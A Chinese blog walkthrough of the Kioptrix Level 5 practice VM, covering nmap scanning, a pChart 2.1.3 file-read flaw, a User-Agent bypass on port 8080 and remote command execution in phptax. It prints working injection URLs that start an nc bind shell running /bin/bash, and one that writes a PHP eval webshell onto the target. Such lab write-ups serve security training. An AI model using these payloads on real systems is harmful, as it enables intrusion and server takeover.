当前位置: 首页 > article >正文

类OCSP靶场-Kioptrix系列-Kioptrix Level 5(2014)

一、前情提要

二、实战打靶

1. 信息收集

1.1. 主机发现

1.2. 端口扫描

1.3.目录遍历

1.4. 敏感信息

2.漏洞发现

2.1. 任意文件访问

2.2. web服务8080端口访问限制绕过

2.3. 远程命令执行

2.4. webshell进行getshell

2.5. 提权


一、前情提要

kali黑客-利用searchsploit搜索exp一键化攻击-CSDN博客

一篇文章带你理解nmap的使用-nmap使用手册-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 1-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 2-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 3-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 4-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 5-CSDN博客


二、实战打靶

这个靶机练习,相当于内网渗透。

1. 信息收集

1.1. 主机发现

在同一局域网下的主机发现思路:

  • 通过ifconfig或ip add的方式查看当前主机的网段

  • 利用nmap对扫描对应子网内的所有主机在线情况

执行完命令可以发现,该网段除了我们的kali还有一台主机在线。

(PS:在虚拟网络下1和2这两个ip分别对应的是网卡和网关。)


1.2. 端口扫描

还是利用nmap进行端口扫描并探测端口服务的版本。

  • 命令:nmap -sT -sV - -O --min-rate 10000 -p- 192.168.xxx.xxx

    • -sT:以TCP三次握手的形式进行扫描

    • -sV:扫描各服务的版本

    • -O:扫描目标机器的操作系统

    • --min-rate:最少的发包数量

    • -p-:全端口扫描


1.3.目录遍历

啥也没爆破出来


1.4. 敏感信息

这个是根据端口探测、手工、目录爆破信息收集来的。

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:B6:28:51 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (94%), OpenBSD 4.X (88%), VMware ESXi 5.X (86%)
OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:openbsd:openbsd:4.0 cpe:/o:vmware:esxi:5.0 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: FreeBSD 9.0-RELEASE - 10.3-RELEASE (94%), FreeBSD 7.0-RELEASE - 9.0-RELEASE (89%), OpenBSD 4.0 (88%), FreeBSD 9.3-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), VMware ESXi 5.0 (86%)
​
​
80端口存在pChart2.1.3/index.php目录文件


2.漏洞发现

2.1. 任意文件访问

searchsploit "pChart 2.1.3"
#搜索根据敏感信息搜索框架漏洞

31173是个任意文件访问

 

这是个FreeBSD系统,FreeBSD系统中Apache的默认安装目录通常是/usr/local/www/apache2x,这是FreeBSD Ports系统中Apache HTTP Server的标准安装位置。如果你是通过ports安装的Apache,那么配置文件通常位于/usr/local/etc/apache2x目录下。 以下是一些常见的Apache目录和文件路径: 二进制文件: /usr/local/www/apache2x/bin/httpd 配置文件: /usr/local/etc/apache2x/httpd.conf 日志文件: /usr/local/var/log/apache2x 模块文件: /usr/local/www/apache2x/modules ​ apache2x里面的x是不确定数字,但都是个位的一个一个试 在这个版本的FreeBSD系统,x是2,里面的apache2x全部替换成apache22

根据上面信息,我们查询一下它的配置文件,但是光这个任意文件访问是无法getshell的,因为权限过低一些可远程连接的文件无法访问读取。


2.2. web服务8080端口访问限制绕过

手工访问,发现无论输入什么目录都限制无权限访问。

利用前面的任意文件访问,从配置文件中查询8080端口的访问要求。找到了User-Agent必须带上Mozilla/4.0

我们用HackBar来实现访问的时候User-Agent带上Mozilla/4.0,发现存在新的页面


2.3. 远程命令执行

测试过后发现该页面都是一个PDF文件作用不大

继续信息收集,根据目录搜索发现了远程执行的exp不过是txt文件。

查看文件内容发现poc,里面存在nc和bash判断为远程命令执行的poc。

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
​
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

直接执行失败了,并且该RCE无回显。

利用echo命令讲结果写入txt文本中查看,验证命令执行漏洞存在。


2.4. webshell进行getshell

经过测试好几个的反弹shell都失败了,考虑可以写文件,尝试写一个一句话木马进去上线,上线成功。

http://192.168.150.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php eval($_POST[123]) ?>' > shell.php;&pdf=make

记得填写User-Agent,如果是本机上需要关闭杀毒软件,不然连接不成功。


2.5. 提权

反弹shell后进行内网信息收集

这个操作系统内核版本存在本地权限提升

发现无法下载

通过webshell管理器将,文件进行上传

提权成功


http://www.kler.cn/a/450918.html

相关文章:

  • 初学stm32 --- 定时器中断
  • GraalVM完全指南:云原生时代下使用GraalVM将Spring Boot 3应用转换为高效Linux可执行文件
  • 【机器学习】探索机器学习与人工智能:驱动未来创新的关键技术
  • Android 常用布局
  • Go怎么做性能优化工具篇之基准测试
  • Activiti开启流程实例
  • GB/T34944-2017 《Java语言源代码漏洞测试规范》解读——行为问题、路径错误、处理程序错误
  • 光谱相机在农业中的具体应用案例
  • C/C++ 数据结构与算法【数组】 数组详细解析【日常学习,考研必备】带图+详细代码
  • zabbix监控山石系列Hillstone监控模版(适用于zabbix7及以上)
  • vue实现打印指定页面内容
  • 消除视野盲区,保障行车安全--叉车四路环绕AI防撞系统
  • 迈向未来:.NET技术的持续创新与发展前景
  • 【华为OD-E卷-木板 100分(python、java、c++、js、c)】
  • Naive UI 分页组件二次封装
  • Dubbo简单总结
  • 【蓝桥杯——物联网设计与开发】基础模块8 - RTC
  • GitPuk安装配置指南
  • LEC: 基于Transformer中间层隐藏状态的高效特征提取与内容安全分类方法
  • 武汉做网站优化推广效果的科学评估方法
  • redis库基础知识
  • SpringBoot开发——Spring Boot 的9大类常用注解
  • 【XR】ATW
  • LeetCode 1705.吃苹果的最大数目:贪心(优先队列) - 清晰题解
  • Python+QQ邮箱调用定时监控——以网站监测为例
  • Z轴方向二维图像插值形成三维图像的算法及其优劣分析